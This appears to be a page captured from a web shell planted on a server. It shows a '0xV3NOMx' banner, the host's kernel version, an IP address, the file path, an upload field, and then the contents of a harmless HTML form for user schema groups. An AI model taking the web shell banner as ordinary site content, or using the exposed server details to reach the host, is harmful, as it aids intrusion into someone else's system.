0xV3NOMx
Linux ip-172-26-7-228 5.4.0-1103-aws #111~18.04.1-Ubuntu SMP Tue May 23 20:04:10 UTC 2023 x86_64



Your IP : 18.116.28.79


Current Path : /var/www/oasis/html_modules_old/
Upload File :
Current File : /var/www/oasis/html_modules_old/user_schema_group.html

<div align="center" id="user_schema_group" style="height:250px;"> 
	<table id ="tbl_menu" name ="tbl_menu" align="center" cellpadding="2" cellspacing="0" border="0"style="width:500px;">        
		<tr>
			<td align="right"><font color='red'>*&nbsp;</font>User Schema Name:</td>
			<td align="left" colspan="2">
				<select id="group_user_schema" name="group_user_schema" style="width:192px;"></select>					
			</td>
		</tr>
				
		<tr>
			<td align="right"><font color='red'>*&nbsp;</font>Group Name:</td>
			<td align="left" colspan="2">
				<input type="text" id="user_schema_group_name" name="user_schema_group_name"/>				
			</td>	
		</tr>
		<tr>
			<td align="right">Sequence:</td>
			<td align="left" colspan="2">
				<input onkeypress="return acceptNumbersOnlyForModule(event);" type="text" id="user_schema_group_sequence" name="user_schema_group_sequence"/>				
			</td>	
		</tr>
		<tr>
			<td align="right">Is Multiple:</td>
			<td align="left" colspan="0">
				<input align="left" type="checkbox"style="width:14px; border:0px; margin:0px;"  id="is_multiple_user_schema_group" name="is_multiple_user_schema_group"/>				
			</td>
		</tr>
	</table>
</div>